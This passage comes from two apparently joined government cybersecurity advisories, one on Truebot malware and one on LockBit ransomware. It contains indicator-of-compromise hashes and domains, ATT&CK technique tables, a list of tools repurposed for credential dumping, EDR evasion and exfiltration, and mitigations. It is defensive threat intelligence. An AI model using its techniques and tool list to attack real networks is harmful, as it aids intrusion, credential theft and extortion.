acac995cee8a6a75fa79eb41bdffa53f |
971a00a392b99f64a3886f40b6ef991e62f0fe2f |
97bae3587f1d2fd35f24eb214b9dd6eed95744bed62468d998c7ef55ff8726d4 |
nefosferta[.]com |
36057710279d9f0d023cb5613aa76d5e |
e4dd1f8fc4e44c8fd0e25242d994c4b59eed6939 |
97d0844ce9928e32b11706e06bf2c4426204d998cb39964dd3c3de6c5223fff0 |
nefosferta[.]com |
37e6904d84153d1435407f4669135134 |
1dcd85f7364ea06cd595a86e3e9be48995d596e9 |
bf3c7f0ba324c96c9a9bff6cf21650a4b78edbc0076c68a9a125ebcba0e523c9 |
nefosferta[.]com |
4f3916e7714f2a32402c9d0b328a2c91 |
87a692e3592f7b997c7d962919e243b665f2be36 |
c3743a8c944f5c9b17528418bf49b153b978946838f56e5fca0a3f6914bee887 |
nefosferta[.]com |
d9daaa0df32b0bb01a09e500fc7f5881 |
f9cb839adba612db5884e1378474996b4436c0cd |
c3b3640ddf53b26f4ebd4eedf929540edb452c413ca54d0d21cc405c7263f490 |
nefosferta[.]com |
c87fb9b9f6c343670bed605420583418 |
f05cf0b026b2716927dac8bcd26a2719ea328964 |
c6c4f690f0d15b96034b4258bdfaf797432a3ec4f73fbc920384d27903143cb0 |
nefosferta[.]com |
2be64efd0fa7739123b26e4b70e53c5c |
318fdfec4575d1530a41c80274aa8caae7b7f631 |
ed38c454575879c2546e5fccace0b16a701c403dfe3c3833730d23b32e41f2fe |
Table 5: Truebot IOCs Connected to Russia, and Panama Locations | |||
---|---|---|---|
Malicious Domain |
IP Addresses |
Files |
SHA256 |
Dremmfyttrred[.]com |
|
|
|
|
45.182.189[.]103 |
|
|
|
94.142.138[.]61 |
|
|
|
172.64.155[.]188 |
|
|
|
104.18.32[.]68 |
|
|
|
|
Update[.]exe |
|
|
|
Document_26_apr_2443807[.]exe |
|
|
|
3ujwy2rz7v[.]exe |
|
|
|
|
fe746402c74ac329231ae1b5dffa8229b509f4c15a0f5085617f14f0c1579040 |
droogggdhfhf[.]com |
|
3LXJyA6Gf[.]exe |
7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7 |
See Tables 6-16 for all referenced cyber threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Table 6: Initial Access | ||
---|---|---|
Technique Title |
ID |
Use |
Replication Through Removable Media |
Cyber threat actors use removable media drives to deploy Raspberry Robin malware. |
|
Drive-by Compromise |
Cyber threat actors embed malicious links or attachments within web domains to gain initial access. |
|
Exploit Public-Facing Application |
Cyber threat actors are exploiting Netwrix vulnerability CVE-2022-31199 for initial access with follow-on capabilities of lateral movement through remote code execution. |
|
Phishing |
Truebot actors can send spear phishing links to gain initial access. |
Table 7: Execution | ||
---|---|---|
Technique Title |
ID |
Use |
Command and Scripting Interpreter |
Cyber threat actors have been observed dropping cobalt strike beacons as a reverse shell proxy to create persistence within the compromised network. Cyber threat actors use FlawedGrace to receive PowerShell commands over a C2 channel to deploy additional tools. |
|
Shared Modules |
Cyber threat actors can deploy malicious payloads through obfuscated share modules. |
|
User Execution: Malicious Link |
Cyber threat actors trick users into clicking a link by making them believe they need to perform a Google Chrome software update. |
Table 8: Persistence | ||
---|---|---|
Technique Title |
ID |
Use |
Hijack Execution Flow: DLL Side-Loading |
Cyber threat actors use Raspberry Robin, among other toolsets to side-load DLLs to maintain persistence. |
Table 9: Privilege Escalation | ||
---|---|---|
Technique Title |
ID |
Use |
Boot or Logon Autostart Execution: Print Processors |
FlawedGrace malware manipulates print spooler functions to achieve privilege escalation. |
Table 10: Defense Evasion | ||
---|---|---|
Technique Title |
ID |
Use |
Obfuscated Files or Information |
Truebot uses a .JSONIP extension (e.g., IgtyXEQuCEvAM.JSONIP), to create a GUID. |
|
Obfuscated Files or Information: Binary Padding |
Cyber threat actors embed around one gigabyte of junk code within the malware string to evade detection protocols. |
|
Masquerading: Masquerade File Type |
Cyber threat actors hide Truebot malware as legitimate appearing file formats. |
|
Process Injection |
Truebot malware has the ability to load shell code after establishing a C2 connection. |
|
Indicator Removal: File Deletion |
Truebot malware implements self-deletion TTPs throughout its attack cycle to evade detection. Teleport exfiltration tool deletes itself after it has completed exfiltrating data to the C2 station. |
|
Modify Registry |
FlawedGrace is able to modify registry programs that control the order that documents are loaded to a print que. |
|
Reflective Code Loading |
Truebot malware has the capability to load shell code and deploy various tools to stealthily navigate an infected network.
|
Table 11: Credential Access | ||
---|---|---|
Technique Title |
ID |
Use |
OS Credential Dumping: LSASS Memory |
Cyber threat actors use cobalt strike to gain valid credentials through LSASS memory dumping. |
Table 12: Discovery | ||
---|---|---|
Technique Title |
ID |
Use |
System Network Configuration Discovery |
Truebot malware scans and enumerates the affected system’s domain names. |
|
Process Discovery |
Truebot malware enumerates all running processes on the local host. |
|
System Information Discovery |
Truebot malware scans and enumerates the OS version information, and processor architecture. Truebot malware enumerates the affected system’s computer names. |
|
System Time Discovery |
Truebot has the ability to discover system time metrics, which aids in enables synchronization with the compromised system’s internal clock to facilitate scheduling tasks. |
|
Software Discovery: Security Software Discovery |
Truebot has the ability to discover software security protocols, which aids in defense evasion. |
|
Debugger Evasion |
Truebot malware scans the compromised environment for debugger tools and enumerates them in effort to evade network defenses. |
Table 13: Lateral Movement | ||
---|---|---|
Technique Title |
ID |
Use |
Exploitation of Remote Services |
Cyber threat actors exploit CVE-2022-31199 Netwrix Auditor vulnerability and use its capabilities to move laterally within a compromised network. |
|
Use Alternate Authentication Material: Pass the Hash |
Cyber threat actors use cobalt strike to authenticate valid accounts |
|
Remote Service Session Hijacking |
Cyber threat actors use cobalt strike to hijack remote sessions using SSH and RDP hijacking methods. |
|
Remote Service Session Hijacking: RDP Hijacking |
Cyber threat actors use cobalt strike to hijack remote sessions using SSH and RDP hijacking methods. |
|
Lateral Tool Transfer |
Cyber threat actors deploy additional payloads to transfer toolsets and move laterally. |
Table 14: Collection | ||
---|---|---|
Technique Title |
ID |
Use |
Data from Local System |
Truebot malware checks the current version of the OS and the processor architecture and compiles the information it receives. Truebot gathers and compiles compromised system’s host and domain names. |
|
Screen Capture |
Truebot malware takes snapshots of local host data, specifically processor architecture data, and sends that to a phase 2 encoded data string. |
Table 15: Command and Control | ||
---|---|---|
Technique Title |
ID |
Use |
Application Layer Protocol |
Cyber threat actors use teleport exfiltration tool to blend exfiltrated data with network traffic. |
|
Non-Application Protocol |
Cyber threat actors use Teleport and FlawedGrace to send data over custom communication protocol. |
|
Ingress Transfer Tool |
Cyber threat actors deploy various ingress transfer tool payloads to move laterally and establish C2 connections. |
|
Encrypted Channel: Asymmetric Cryptography |
Cyber threat actors use Teleport to create an encrypted channel using AES. |
Table 16: Exfiltration | ||
---|---|---|
Technique Title |
ID |
Use |
Scheduled Transfer |
Teleport limits the data it collects and syncs with outbound organizational data/network traffic. |
|
Data Transfer Size Limits |
Teleport limits the data it collects and syncs with outbound organizational data/network traffic. |
|
Exfiltration Over C2 Channel |
Cyber threat actors blend exfiltrated data with network traffic to evade detection. Cyber threat actors use the Teleport tool to exfiltrate data over a C2 protocol. |
CISA and authoring organizations recommend that organizations review and implement the following detection signatures, along with: Win/malicious_confidence100% (W)
, Trojan:Win32/Tnega!MSR
, and Trojan.Agent.Truebot.Gen
, as well as YARA rules below to help detect Truebot malware.
|
CISA developed the following YARA to aid in detecting the presence of Truebot Malware.
|
The following steps are recommended if organizations detect a Truebot malware infection and compromise:
CISA and the authoring organizations recommend organizations implement the below mitigations, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services.
For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. Because the CPGs are a subset of best practices, CISA and co-sealers recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).
Netwrix recommends using their Auditor application only on internally facing networks. System owners that don't follow this recommendation, and use the application in externally facing instances, are at increased risk to having CVE-2022-31199 exploited on their systems.
Reduce threat of malicious actors using remote access tools by:
See the National Security Agency’s Cybersecurity Information sheet, Enforce Signed Software Execution Policies, and additional guidance below:
In addition, CISA, FBI, MS-ISAC, and CCCS recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] Bishop Fox: Netwrix Auditor Advisory
[2] Talos Intelligence: Breaking the Silence - Recent Truebot Activity
[3] The DFIR Report: Truebot Deploys Cobalt Strike and FlawedGrace
[4] MAR-10445155-1.v1 .CLEAR Truebot Activity Infects U.S. and Canada Based Networks
[5] Red Canary: Raspberry Robin Delivery Vector
[6] Microsoft: Raspberry Robin Worm Part of a Larger Ecosystem Pre-Ransomware Activity
[7] Telsy: FlawedGrace RAT
[8] VMware Security Blog: Carbon Black’s Truebot Detection
[9] GitHub: DFIR Report - Truebot Malware YARA Rule
Alarming Surge in TrueBot Activity Revealed with New Delivery Vectors (thehackernews.com)
Truebot Analysis Part 1
Truebot Analysis Part 2
Truebot Analysis Part 3
Truebot Exploits Netwrix Vulnerability
TrueBot malware delivery evolves, now infects businesses in the US and elsewhere
Malpedia-Silence Downloader
Printer spooling: what is it and how to fix it? | PaperCut
VMware Carbon Black and Mandiant contributed to this CSA.
The information in this report is being provided “as is” for informational purposes only. CISA and authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, and co-sealers.
]]>In 2022, LockBit was the most deployed ransomware variant across the world and continues to be prolific in 2023. Since January 2020, affiliates using LockBit have attacked organizations of varying sizes across an array of critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. LockBit ransomware operation functions as a Ransomware-as-a-Service (RaaS) model where affiliates are recruited to conduct ransomware attacks using LockBit ransomware tools and infrastructure. Due to the large number of unconnected affiliates in the operation, LockBit ransomware attacks vary significantly in observed tactics, techniques, and procedures (TTPs). This variance in observed ransomware TTPs presents a notable challenge for organizations working to maintain network security and protect against a ransomware threat.
The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the following international partners, hereafter referred to as “authoring organizations,” are releasing this Cybersecurity Advisory (CSA) detailing observed activity in LockBit ransomware incidents and providing recommended mitigations to enable network defenders to proactively improve their organization’s defenses against this ransomware operation.
The authoring organizations encourage the implementation of the recommendations found in this CSA to reduce the likelihood and impact of future ransomware incidents.
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13.1. See the MITRE ATT&CK Tactics and Techniques section for tables of LockBit’s activity mapped to MITRE ATT&CK® tactics and techniques.
The LockBit RaaS and its affiliates have negatively impacted organizations, both large and small, across the world. In 2022, LockBit was the most active global ransomware group and RaaS provider in terms of the number of victims claimed on their data leak site. [1] A RaaS cybercrime group maintains the functionality of a particular ransomware variant, sells access to that ransomware variant to individuals or groups of operators (often referred to as “affiliates”), and supports affiliates’ deployment of their ransomware in exchange for upfront payment, subscription fees, a cut of profits, or a combination of upfront payment, subscription fees, and a cut of profits. Some of the methods LockBit has used to successfully attract affiliates include, but are not limited to:
LockBit has been successful through innovation and ongoing development of the group’s administrative panel and the RaaS supporting functions. In parallel, affiliates that work with LockBit and other notable variants are constantly revising the TTPs used for deploying and executing ransomware.
Table 1 shows LockBit RaaS’s innovation and development.
Table 1: Evolution of LockBit RaaS
Date |
Event |
September 2019 |
First observed activity of ABCD ransomware, the predecessor to LockBit. [4] |
January 2020 |
LockBit-named ransomware first seen on Russian-language based cybercrime forums. |
June 2021 |
Appearance of LockBit version 2 (LockBit 2.0), also known as LockBit Red including StealBit, a built-in information-stealing tool. |
October 2021 |
Introduction of LockBit Linux-ESXi Locker version 1.0 expanding capabilities to target systems to Linux and VMware ESXi. [5] |
March 2022 |
Emergence of LockBit 3.0, also known as LockBit Black, that shares similarities with BlackMatter and Alphv (also known as BlackCat) ransomware. |
September 2022 |
Non-LockBit affiliates able to use LockBit 3.0 after its builder was leaked. [2, 6] |
January 2023 |
Arrival of LockBit Green incorporating source code from Conti ransomware. [7] |
April 2023 |
LockBit ransomware encryptors targeting macOS seen on VirusTotal [8, 9] |
LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker are still available for affiliates’ use on LockBit’s panel.
Since the first case in July 2020 to present, ANSSI has handled 80 alerts linked to the LockBit ransomware, which accounts for 11% of all ransomware cases handled by ANSSI in that period. In about 13% of those cases, ANSSI was not able to confirm nor deny the breach of its constituents’ networks – as the alerts were related to the threat actor’s online claims. So far, 69 confirmed incidents have been handled by ANSSI. Table 2 shows the LockBit activity observed by ANSSI versus overall ransomware activity tracked by the Computer Emergency Response Team-France (CERT-FR).
Table 2: ANSSI-Observed LockBit vs. Overall Ransomware Activity
Year |
Number of Incidents |
Percentage of CERT-FR’s Ransomware-Related Activity |
2020 (from July) |
4 |
2% |
2021 |
20 |
10% |
2022 |
30 |
27% |
2023 |
15 |
27% |
Total (2020-2023) |
69 |
11% |
Table 3 shows the number of instances different LockBit strains were observed by ANSSI from July 2020 to present.
Table 3: ANSSI-Observed LockBit Strain and Number of Instances
Name of the Strain* |
Number of Instances |
LockBit 2.0 (LockBit Red) |
26 |
LockBit 3.0 (LockBit Black) |
23 |
LockBit |
21 |
LockBit Green |
1 |
LockBit (pre-encryption) |
1 |
Total |
72** |
Figure 1: ANSSI-Observed LockBit Strains by Year
From the incidents handled, ANSSI can infer that LockBit 3.0 widely took over from LockBit 2.0 and the original LockBit strain from 2022. In two cases, victims were infected with as many as three different strains of LockBit (LockBit 2.0/Red, LockBit 3.0/Black, and LockBit Green).
The authoring agencies observe data leak sites, where attackers publish the names and captured data of victims if they do not pay ransom or hush money. Additionally, these sites can be used to record alleged victims who have been threatened with a data leak. The term 'victims' may include those who have been attacked, or those who have been threatened or blackmailed (with the attack having taken place).
The leak sites only show the portion of LockBit affiliates’ victims subjected to secondary extortion. Since 2021, LockBit affiliates have employed double extortion by first encrypting victim data and then exfiltrating that data while threatening to post that stolen data on leak sites. Because LockBit only reveals the names and leaked data of victims who refuse to pay the primary ransom to decrypt their data, some LockBit victims may never be named or have their exfiltrated data posted on leak sites. As a result, the leak sites reveal a portion of LockBit affiliates’ total victims. For these reasons, the leak sites are not a reliable indicator of when LockBit ransomware attacks occurred. The date of data publication on the leak sites may be months after LockBit affiliates actually executed ransomware attacks.
Up to the Q1 2023, a total of 1,653 alleged victims were observed on LockBit leak sites. With the introduction of LockBit 2.0 and LockBit 3.0, the leak sites have changed, with some sources choosing to differentiate leak sites by LockBit versions and others ignoring any differentiation. Over time, and through different evolutions of LockBit, the address and layout of LockBit leak sites have changed and are aggregated under the common denominator of the LockBit name. The introduction of LockBit 2.0 at the end of the Q2 2021 had an immediate impact on the cybercriminal market due to multiple RaaS operations shutting down in May and June 2021 (e.g., DarkSide and Avaddon). LockBit competed with other RaaS operations, like Hive RaaS, to fill the gap in the cybercriminal market leading to an influx of LockBit affiliates. Figure 2 shows the alleged number of victims worldwide on LockBit leak sites starting in Q3 2020. Figure 2 shows the alleged number of victims worldwide on LockBit leak sites starting in Q3 2020.
Figure 2: Alleged Number of Victims Worldwide on LockBit Leak Sites
During their intrusions, LockBit affiliates have been observed using various freeware and open-source tools that are intended for legal use. When repurposed by LockBit, these tools are then used for a range of malicious cyber activity, such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and batch scripts are observed across most intrusions, which focus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed.
Table 4 shows a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations. The legitimate freeware and open-source tools mentioned in this product are all publicly available and legal. The use of these tools by a threat actor should not be attributed to the freeware and open-source tools, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.
Table 4: Freeware and Open-Source Tools Used by LockBit Affiliates
Tool |
Intended Use |
Repurposed Use by LockBit Affiliates |
MITRE ATT&CK ID |
7-zip |
Compresses files into an archive. |
Compresses data to avoid detection before exfiltration. |
Impair Defenses |
AdFind |
Searches Active Directory (AD) and gathers information. |
Gathers AD information used to exploit a victim’s network, escalate privileges, and facilitate lateral movement. |
AdFind |
Advanced Internet Protocol (IP) Scanner |
Performs network scans and shows network devices. |
Maps a victim’s network to identify potential access vectors. |
Network Service Discovery |
Advanced Port Scanner |
Performs network scans. |
Finds open Transmission Control Protocol (TCP) and User Data Protocol (UDP) ports for exploitation. |
Network Service Discovery |
AdvancedRun |
Allows software to be run with different settings. |
Enables escalation of privileges by changing settings before running software. |
Privilege Escalation |
AnyDesk |
Enables remote connections to network devices. |
Enables remote control of victim’s network devices. |
Remote Access Software |
Atera Remote Monitoring & Management (RMM) |
Enables remote connections to network devices. |
Enables remote control of victim’s network devices. |
Remote Access Software |
Backstab |
Terminates antimalware-protected processes. |
Terminates endpoint detection and response (EDR)- protected processes. |
Impair Defenses: Disable or Modify Tools |
Bat Armor |
Generates .bat files using PowerShell scripts. |
Bypasses PowerShell execution policy. |
Impair Defenses: Disable or Modify Tools |
Bloodhound |
Performs reconnaissance of AD for attack path management. |
Enables identification of AD relationships that can be exploited to gain access onto a victim’s network. |
Domain Trust Discovery |
Chocolatey |
Handles command-line package management on Microsoft Windows. |
Facilitates installation of LockBit affiliate actors’ tools. |
Software Deployment Tools |
Defender Control |
Disables Microsoft Defender. |
Enables LockBit affiliate actors to bypass Microsoft Defender. |
Impair Defenses: Disable or Modify Tools |
ExtPassword |
Recovers passwords from Windows systems. |
Obtains credentials for network access and exploitation. |
Operating System (OS) Credential Dumping |
FileZilla |
Performs cross-platform File Transfer Protocol (FTP) to a site, server, or host. |
Enables data exfiltration over FTP to the LockBit affiliate actors’ site, server, or host. |
Application Layer Protocol: File Transfer Protocols |
FreeFileSync |
Facilitates cloud-based file synchronization. |
Facilitates cloud-based file synchronization for data exfiltration. |
Exfiltration Over Web Service: Exfiltration to Cloud Storage |
GMER |
Removes rootkits. |
Terminates and removes EDR software. |
Impair Defenses: Disable or Modify Tools |
Impacket |
Collection of Python classes for working with network protocols. |
Enables lateral movement on a victim’s network. |
Impacket |
LaZagne |
Recovers system passwords across multiple platforms. |
Collect credentials for accessing a victim’s systems and network. |
LaZagne |
Ligolo |
Establishes SOCKS5 or TCP tunnels from a reverse connection for pen testing. |
Enables connections to systems within the victim’s network via reverse tunneling. |
Non-Application Layer Protocol |
LostMyPassword |
Recovers passwords from Windows systems. |
Obtains credentials for network access and exploitation. |
OS Credential Dumping |
MEGA Ltd MegaSync |
Facilitates cloud-based file synchronization. |
Facilitates cloud-based file synchronization for data exfiltration. |
Exfiltration Over Web Service: Exfiltration to Cloud Storage |
Microsoft Sysinternals ProcDump |
Monitors applications for central processing unit (CPU) spikes and generates crash dumps during a spike. |
Obtains credentials by dumping the contents of Local Security Authority Subsystem Service (LSASS). |
OS Credential Dumping: LSASS Memory |
Microsoft Sysinternals PsExec |
Executes a command-line process on a remote machine. |
Enables LockBit affiliate actors to control victim’s systems. |
PsExec |
Mimikatz |
Extracts credentials from a system. |
Extracts credentials from a system for gaining network access and exploiting systems. |
Mimikatz |
Ngrok |
Enables remote access to a local web server by tunnelling over the internet. |
Enables victim network protections to be bypassed by tunnelling to a system over the internet. |
Ngrok |
PasswordFox |
Recovers passwords from Firefox Browser. |
Obtains credentials for network access and exploitation. |
Credentials from Web Browsers |
PCHunter |
Enables advanced task management including system processes and kernels. |
Terminates and circumvents EDR processes and services. |
Impair Defenses: Disable or Modify Tools |
PowerTool |
Removes rootkits, as well as detecting, analyzing, and fixing kernel structure modifications. |
Terminates and removes EDR software. |
Impair Defenses: Disable or Modify Tools |
Process Hacker |
Removes rootkits. |
Terminates and removes EDR software. |
Impair Defenses: Disable or Modify Tools |
PuTTY Link (Plink) |
Automates Secure Shell (SSH) actions on Windows. |
Enables LockBit affiliate actors to avoid detection. |
Protocol Tunneling |
Rclone |
Manages cloud storage files using a command-line program. |
Facilitates data exfiltration over cloud storage. |
Rclone |
Seatbelt |
Performs numerous security-oriented checks.
|
Performs numerous security-oriented checks to enumerate system information. |
System Information Discovery |
ScreenConnect (also known as ConnectWise) |
Enables remote connections to network devices for management. |
Enables LockBit affiliate actors to remotely connect to a victim’s systems. |
Remote Access Software |
SoftPerfect Network Scanner |
Performs network scans for systems management. |
Enables LockBit affiliate actors to obtain information about a victim’s systems and network. |
Network Service Discovery |
Splashtop |
Enables remote connections to network devices for management. |
Enables LockBit affiliate actors to remotely connect to systems over Remote Desktop Protocol (RDP). |
Remote Services: Remote Desktop Protocol |
TDSSKiller |
Removes rootkits. |
Terminates and removes EDR software. |
Impair Defenses: Disable or Modify Tools |
TeamViewer |
Enables remote connections to network devices for management. |
Enables LockBit affiliate actors to remotely connect to a victim’s systems. |
Remote Access Software |
ThunderShell |
Facilitates remote access via Hypertext Transfer Protocol (HTTP) requests. |
Enables LockBit affiliate actors to remotely access systems while encrypting network traffic. |
Application Layer Protocol: Web Protocols |
WinSCP |
Facilitates file transfer using SSH File Transfer Protocol for Microsoft Windows. |
Enables data exfiltration via the SSH File Transfer Protocol. |
Exfiltration Over Alternative Protocol |
Based on secondary sources, it was noted that affiliates exploit older vulnerabilities like CVE-2021-22986, F5 iControl REST unauthenticated Remote Code Execution Vulnerability, as well as newer vulnerabilities such as:
LockBit affiliates have been documented exploiting numerous CVEs, including:
For further information on these CVEs, see CISA’s Known Exploited Vulnerabilities (KEV) Catalog.
When LockBit affiliates target an organization responsible for managing other organizations’ networks, CERT NZ has observed LockBit affiliates attempt secondary ransomware extortion after detonation of the LockBit variant on the primary target. Once the primary target is hit, LockBit affiliates then attempt to extort the companies that are customers of the primary target. This extortion is in the form of secondary ransomware that locks down services those customers consume. Additionally, the primary target’s customers may be extorted by LockBit affiliates threatening to release those customers’ sensitive information.
Tables 5-16 show the LockBit affiliate tactics and techniques referenced in this advisory.
Table 5: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Initial Access
Technique Title |
ID |
Use |
Drive-by Compromise |
LockBit affiliates gain access to a system through a user visiting a website over the normal course of browsing. |
|
Exploit Public-Facing Application |
LockBit affiliates may exploit vulnerabilities (e.g., Log4Shell) in internet-facing systems to gain access to victims’ systems. |
|
External Remote Services |
LockBit affiliates exploit RDP to gain access to victims’ networks. |
|
Phishing |
LockBit affiliates use phishing and spearphishing to gain access to victims' networks. |
|
Valid Accounts |
LockBit affiliates obtain and abuse credentials of existing accounts as a means of gaining initial access. |
Table 6: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Execution
Technique Title |
ID |
Use |
Execution |
LockBit 3.0 launches commands during its execution. |
|
Command and Scripting Interpreter: Windows Command Shell |
LockBit affiliates use batch scripts to execute malicious commands. |
|
Software Deployment Tools |
LockBit affiliates may use Chocolatey, a command-line package manager for Windows. |
Technique Title |
ID |
Use |
System Services: Service Execution |
LockBit 3.0 uses PsExec to execute commands or payloads. |
Table 7: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Persistence
Technique Title |
ID |
Use |
Boot or Logon Autostart Execution |
LockBit affiliates enables automatic logon for persistence. |
|
Valid Accounts |
LockBit affiliates may use a compromised user account to maintain persistence on the target network. |
Table 8: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Privilege Escalation
ID |
Use |
|
Privilege Escalation |
LockBit affiliates will attempt to escalate to the required privileges if current account privileges are insufficient. |
|
Abuse Elevation Control Mechanism |
LockBit affiliates may use ucmDccwCOM Method in UACMe, a GitHub collection of User Account Control (UAC) bypass techniques. |
|
Boot or Logon Autostart Execution |
LockBit affiliates enable automatic logon for privilege escalation. |
|
Domain Policy Modification: Group Policy Modification |
LockBit affiliates may create Group Policy for lateral movement and can force group policy updates. |
|
Valid Accounts |
LockBit affiliates may use a compromised user account to escalate privileges on a victim’s network. |
Table 9: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Defense Evasion
Technique Title |
ID |
Use |
Execution Guardrails: Environmental Keying |
LockBit 3.0 will only decrypt the main component or continue to decrypt and/or decompress data if the correct password is entered. |
|
Impair Defenses: Disable or Modify Tools |
LockBit 3.0 affiliates use Backstab, Defender Control, GMER, PCHunter, PowerTool, Process Hacker or TDSSKiller to disable EDR processes and services.
LockBit 3.0 affiliates use Bat Armor to bypass the PowerShell execution Policy.
LockBit affiliates may deploy a batch script, 123.bat, to disable and uninstall antivirus software.
Lockbit 3.0 may modify and/or disable security tools including EDR and antivirus to avoid possible detection of malware, tools, and activities. |
|
Indicator Removal: Clear Windows Event Logs |
|
LockBit executable clears the Windows Event Logs files. |
Indicator Removal: File Deletion |
LockBit 3.0 will delete itself from the disk. |
|
Obfuscated Files or Information |
LockBit 3.0 will send encrypted host and bot information to its command and control (C2) servers. |
|
Obfuscated Files or Information: Software Packing |
LockBit affiliates may perform software packing or virtual machine software protection to conceal their code. Blister Loader has been used for such purpose. |
Table 10: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Credential Access
Technique Title |
ID |
Use |
Brute Force |
LockBit affiliates may leverage VPN or RDP brute force credentials as an initial access. |
|
Credentials from Password Stores: Credentials from Web Browsers |
LockBit 3.0 actors use PasswordFox to recover passwords from Firefox Browser. |
|
OS Credential Dumping |
LockBit 3.0 actors use ExtPassword or LostMyPassword to recover passwords from Windows systems. |
|
OS Credential Dumping: LSASS Memory |
LockBit affiliates may use Microsoft Sysinternals ProDump to dump the contents of lsass.exe. LockBit affiliates have used Mimikatz to dump credentials. |
Table 11: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Discovery
Technique Title |
ID |
Use |
Network Service Discovery |
LockBit affiliates use SoftPerfect Network Scanner, Advanced IP Scanner, or Advanced Port Scanner to scan target networks. LockBit affiliates may use SoftPerfect Network Scanner, Advanced Port Scanner, and AdFind to enumerate connected machines in the network. |
|
System Information Discovery |
LockBit affiliates will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. |
|
System Location Discovery: System Language Discovery |
LockBit 3.0 will not infect machines with language settings that match a defined exclusion list. |
Table 12: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Lateral Movement
Technique Title |
ID |
Use |
Lateral Movement |
LockBit affiliates will laterally move across networks and access domain controllers. |
|
Remote Services: Remote Desktop Protocol |
LockBit affiliates use Splashtop remote-desktop software to facilitate lateral movement. |
|
Remote Services: Server Message Block (SMB)/Admin Windows Shares |
LockBit affiliates may use Cobalt Strike and target SMB shares for lateral movement. |
Table 13: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Collection
Technique Title |
ID |
Use |
Archive Collected Data: Archive via Utility |
LockBit affiliates may use 7-zip to compress and/or encrypt collected data prior to exfiltration. |
Table 14: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Command and Control
Technique Title |
ID |
Use |
Application Layer Protocol: File Transfer Protocols |
LockBit affiliates may use FileZilla for C2. |
|
Application Layer Protocol: Web Protocols |
LockBit affiliates use ThunderShell as a remote access tool that communicates via HTTP requests. |
|
Non-Application Layer Protocol |
LockBit affiliates use Ligolo to establish SOCKS5 or TCP tunnels from a reverse connection. |
|
Protocol Tunneling |
LockBit affiliates use Plink to automate SSH actions on Windows. |
|
Remote Access Software | T1219 | LockBit 3.0 actors use AnyDesk, Atera RMM, ScreenConnect or TeamViewer for C2. |
Table 15: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Exfiltration
Technique Title |
ID |
Use |
Exfiltration |
LockBit affiliates use StealBit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network. |
|
Exfiltration Over Web Service |
LockBit affiliates use publicly available file sharing services to exfiltrate a target’s data. |
|
Exfiltration Over Web Service: Exfiltration to Cloud Storage |
LockBit affiliates use (1) Rclone, an open-source command line cloud storage manager or FreeFileSync to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration. |
Table 16: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Impact
Technique Title |
ID |
Use |
Data Destruction | T1485 | LockBit 3.0 deletes log files and empties the recycle bin. |
Data Encrypted for Impact | T1486 |
LockBit 3.0 encrypts data on target systems to interrupt availability to system and network resources. LockBit affiliates can encrypt Windows and Linux devices, as well as VMware instances. |
Defacement: Internal Defacement |
LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively. |
|
Inhibit System Recovery |
LockBit 3.0 deletes volume shadow copies residing on disk. |
|
Service Stop |
LockBit 3.0 terminates processes and services. |
The authoring organizations recommend implementing the mitigations listed below to improve their cybersecurity posture to better defend against LockBit’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
